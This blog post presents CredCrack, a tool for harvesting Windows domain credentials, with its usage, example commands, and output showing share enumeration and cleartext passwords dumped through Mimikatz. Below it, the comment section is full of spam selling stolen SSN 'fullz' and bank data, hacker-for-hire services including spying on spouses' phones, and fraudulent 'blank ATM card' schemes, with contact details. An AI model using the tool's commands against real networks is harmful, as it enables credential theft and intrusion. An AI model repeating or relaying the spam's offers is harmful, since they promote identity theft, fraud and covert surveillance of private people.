CredCrack
Introduction
CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recusively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!
CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here
Help
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File containing IPs to harvest creds from. One IP per
line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds from.
-es, --enumshares Examine share access on the remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Examples
Enumerating Share Access
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
---------------------------------------------------------------------
CredCrack v1.1 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100
-----------------------------------------------------------------
192.168.1.102 - Windows 7 Professional 7601 Service Pack 1
-----------------------------------------------------------------
OPEN \\192.168.1.102\ADMIN$
OPEN \\192.168.1.102\C$
-----------------------------------------------------------------
192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2
-----------------------------------------------------------------
OPEN \\192.168.1.103\ADMIN$
OPEN \\192.168.1.103\C$
CLOSED \\192.168.1.103\F$
-----------------------------------------------------------------
192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
-----------------------------------------------------------------
CLOSED \\192.168.1.100\ADMIN$
CLOSED \\192.168.1.100\C$
OPEN \\192.168.1.100\NETLOGON
OPEN \\192.168.1.100\SYSVOL
[*] Done! Completed in 0.8s
Harvesting credentials
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
---------------------------------------------------------------------
CredCrack v1.1 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103
The loot has arrived...
__________
/\____;;___\
| / /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | % )) |
% \|%________|
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!
1 domain administrators found and highlighted in yellow above!
[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s
Nice post...
ReplyDeleteWe are providing the best master data services around the world....visit our website for more information....
master data management in sap
data cleansing tools
Master Data Governance
Data Cleansing Services
data classification tools
Master Data Management Solutions
data transformation service
Material Master Data Management
Master Data Dictionary
Master Data Problems
Selling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
Delete**Price for One SSN lead 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
GREAT NEWS, YOU'VE JUST FOUND A LEGIT HACKER,
ReplyDeleteHAVE YOU LOST YOUR HARD EARNED FUNDS TO THE BINARY OPTION SCAM?
Right now, millions of hackers, spammers and scammers are hard at work. They're after your Social Security number, bank account information and social media accounts. With any of these, they can steal your money or trick your friends into giving up theirs.
Between semi-amateurs with automated systems and serious hackers who are masters of technology and trickery, how can you possibly hope to stay safe?
The best way is to know how hackers do what they do. Once you know that, you can counter their malicious acts.
Welcome to the ALEXGHACKLORD@GMAIL .com
In the world of hacking we are the best when it comes to client satisfaction. Stop being scammed by fake hackers. Profound Hacks Tech is an experienced online Private Investigator/Ethical Hacker providing investigative solutions and related services to individuals. You might be curious that what hacking group services can provide? .. If you hire a hacker, you always have worried of losing your money. We won't keep a cent if we can't do your job. 100% refund if job is not completed. Contact - ALEXGHACKLORD@GMAIL. com We render
+University Grades Hack,
+Bank Account Hacks,
+Control devices remotely hack,
+Facebook Hacking Tricks,
+Gmail, AOL, Yahoomail, inbox, mobile phone (call and text message Hacking are available)
+Database Hacking,
+PC Computer Tricks
+Bank transfer, Western Union, Money Gram, Credit Card transfer
+Wiping of Credit,
+VPN Software,
+ATM Hack
email us now ::ALEXGHACKLORD@GMAIL. COM
+Are you suspecting your partner of cheating or having an extramarital affair?
As that could result in unnecessary confusion in your relationship or marriage. it's always advisable to consult a professional hacker to help you get concrete evidence by discreetly getting access to their phone or computers.
ALEXGHACKLORD can also work on that.
NOTE
ReplyDeleteEmail:CYBERFILES.HACKER@GMAIL.COM
REACH US THROUGH THE EMAIL ABOVE, FOR SPYING AND HACKING PHONES, COMPUTER, EMAIL, FACEBOOK, WHATSAPP AND OTHER SOCIAL NETWORK ACCOUNTS, CANCEL PHONE TAPPING, CHANGE YOUR GRADES OR BOOST YOUR CREDIT SCORE.
OUR SERVICES ARE THE BEST ON THE MARKET AND 100% SECURE AND GUARANTEED.
McAfee offers a high level of security and has an advanced scanning feature. The McAfee firewall secures the users from unknown websites. It also gives the users a full report about the threats which the antivirus had already blocked from the system. The retail card of McAfee will permit the users to download, install and activate McAfee product to their system by inserting a compact disk or going to its website.
ReplyDeleteMcafee.com/Activate
GREAT NEWS, YOU'VE JUST FOUND A LEGIT HACKER,
ReplyDeleteHAVE YOU LOST YOUR HARD EARNED FUNDS TO THE BINARY OPTION SCAM?
Right now, millions of hackers, spammers and scammers are hard at work. They're after your Social Security number, bank account information and social media accounts. With any of these, they can steal your money or trick your friends into giving up theirs.
Between semi-amateurs with automated systems and serious hackers who are masters of technology and trickery, how can you possibly hope to stay safe?
The best way is to know how hackers do what they do. Once you know that, you can counter their malicious acts.
Welcome to the ALEXGHACKLORD@GMAIL .com
In the world of hacking we are the best when it comes to client satisfaction. Stop being scammed by fake hackers. Profound Hacks Tech is an experienced online Private Investigator/Ethical Hacker providing investigative solutions and related services to individuals. You might be curious that what hacking group services can provide? .. If you hire a hacker, you always have worried of losing your money. We won't keep a cent if we can't do your job. 100% refund if job is not completed. Contact - ALEXGHACKLORD@GMAIL. com We render
+University Grades Hack,
+Bank Account Hacks,
+Control devices remotely hack,
+Facebook Hacking Tricks,
+Gmail, AOL, Yahoomail, inbox, mobile phone (call and text message Hacking are available)
+Database Hacking,
+PC Computer Tricks
+Bank transfer, Western Union, Money Gram, Credit Card transfer
+Wiping of Credit,
+VPN Software,
+ATM Hack
email us now ::ALEXGHACKLORD@GMAIL. COM
+Are you suspecting your partner of cheating or having an extramarital affair?
As that could result in unnecessary confusion in your relationship or marriage. it's always advisable to consult a professional hacker to help you get concrete evidence by discreetly getting access to their phone or computers.
ALEXGHACKLORD can also work on that.
NOTE
I am announcing this amazing testimonial on this blog, about united hacking company how the Blank ATM Card experience changed my whole life.the blank Atm Programmed Card and cash money directly in any ATM Machine around you. There is no risk of being caught, because the card has been programmed in such a way that it´s not traceable,so luckily i read about the blank ATM card exercise and how it has made people become rich. I contacted the email address i attached to the testimonial of some beneficiaries and here i am today, all thanks to united Tech Hackers Team Incorporation world wide for helping me with a blank ATM Card. Now all my financial worries are over. All you need to do is send a message to the email address provided: unitedblankatmhackcard@gmail.com
ReplyDeleteI am announcing this amazing testimonial on this blog, about united hacking company how the Blank ATM Card experience changed my whole life.the blank Atm Programmed Card and cash money directly in any ATM Machine around you. There is no risk of being caught, because the card has been programmed in such a way that it´s not traceable,so luckily i read about the blank ATM card exercise and how it has made people become rich. I contacted the email address i attached to the testimonial of some beneficiaries and here i am today, all thanks to united Tech Hackers Team Incorporation world wide for helping me with a blank ATM Card. Now all my financial worries are over. All you need to do is send a message to the email address provided: unitedblankatmhackcard@gmail.com
ReplyDelete
ReplyDeleteI'm here to testify about Mr John Blank ATM Cards which can withdraw money from any ATM machines around the world.. firstly I thought it was scam until I saw so many testimony about how Mr John sent them the ATM blank card and how it was used to withdraw money in any ATM machine and become rich so I decided to risk the opportunity I contacted him also and I applied for the Blank Card to my greatest surprise I have used it to get 10,000 dollars. maximum withdrawal daily $1,000, Mr John is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault,If your interested kindly contact him directly on his email (johnlopez1945@gmail.com)
To hire ethical hackers that’ll solve all your problems like hack emails,Facebook, Twitter ,Instagram , change grades ,erase criminal records, credit and debit top up, insurance paper, access or recover lost files, background checks on individuals and organizations or monitor cheating spouses’ phone or social media activities, contact at HACKINTECHNOLOGY@GMAIL.COM
ReplyDeleteAn hacker helped me to spy on my wife’s WhatsApp,mails and every text message that was sent to her iPhone and every deleted messages of the past six months you can message him through this number (+13852501115) or contact him via email at brillianthackers800@gmail.com
ReplyDeleteHello, we are offering service for online CC/w high balance which is ATM Card.You can use it anywhere in the world to withdraw money from any ATM machine.>>>>>What are the list, cost and how do i purchase the card?Contact us with the following address:
ReplyDeleteemail: blankadvanceatm@gmail.com
on WhatsApp:+15716666386
Say no to financial crisis, looking for money to start your own business, invest in business or to pay your bills?
GET YOUR BLANK ATM CREDIT CARD AT AFFORDABLE PRICE
We sell this card to all our customers and interested buyers worldwide, The card has a daily withdrawal limit of $ 5000 and up to $ 50,000 spending limit in stores and unlimited on POS. WE ARE REAL AND LEGIT ........... 2020 FUNDS / FORGET ABOUT GETTING A LOAN ..
it is secure and has easy steps
IT HAS BEEN TESTED AND TRUSTED ALL OVER THE WORLD BY MANY DON'T BE LEFT OUT contact us on:
email: blankadvanceatm@gmail.com
on WhatsApp:+15716666386
Are you in need of finance? we give out guarantee cash at 3% interest rate. Contact us on any kind of finance now: financialserviceoffer876@gmail.com whatspp Number +918929509036 Dr James Eric
ReplyDeleteSelling USA FRESH SSN Leads/Fullz, along with Driving License/ID Number with good connectivity.
ReplyDelete**Price for One SSN lead 2$**
All SSN's are Tested & Verified. Fresh spammed data.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
->Bulk order negotiable
->Hope for the long term business
->You can asked for specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
CONTACT 24/7
ReplyDeleteTelegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
We are Selling SSN Dob Leads/Fullz/Pros, along with Driving License/ID Number For Tax return & W-2 Form filling, etc.
**PRICE**
>>1$ each without DL/ID number
>>2$ each with DL
>>5$ each for premium (also included relative info)
**DETAILS IN LEADs/FULLZ/PROS**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER WITH EXPIRY DATE
->COMPLETE ADDRESS
->PHONE NUMBER, EMAIL, I.P ADDRESS
->EMPLOYMENT DETAILS
->REALTIONSHIP DETAILS
->MORTGAGE INFO
->BANK ACCOUNT DETAILS
>All Leads are Spammed & Verified.
>Fresh spammed data of USA Credit Bureau
>Good credit Scores, 700 minimum scores
>Bulk order will be preferable
>Invalid info found, will be replaced.
>Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY
''OTHER GADGETS PROVIDING''
>SSN+DOB Fullz
>CC with CVV
>Dead Fullz
>Carding Tutorials
>Hacking Tutorials
>SMTP Linux Root
>DUMPS with pins track 1 and 2
>Sock Tools
>Server I.P's
>HQ Emails with passwords
**Contact 24/7**
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040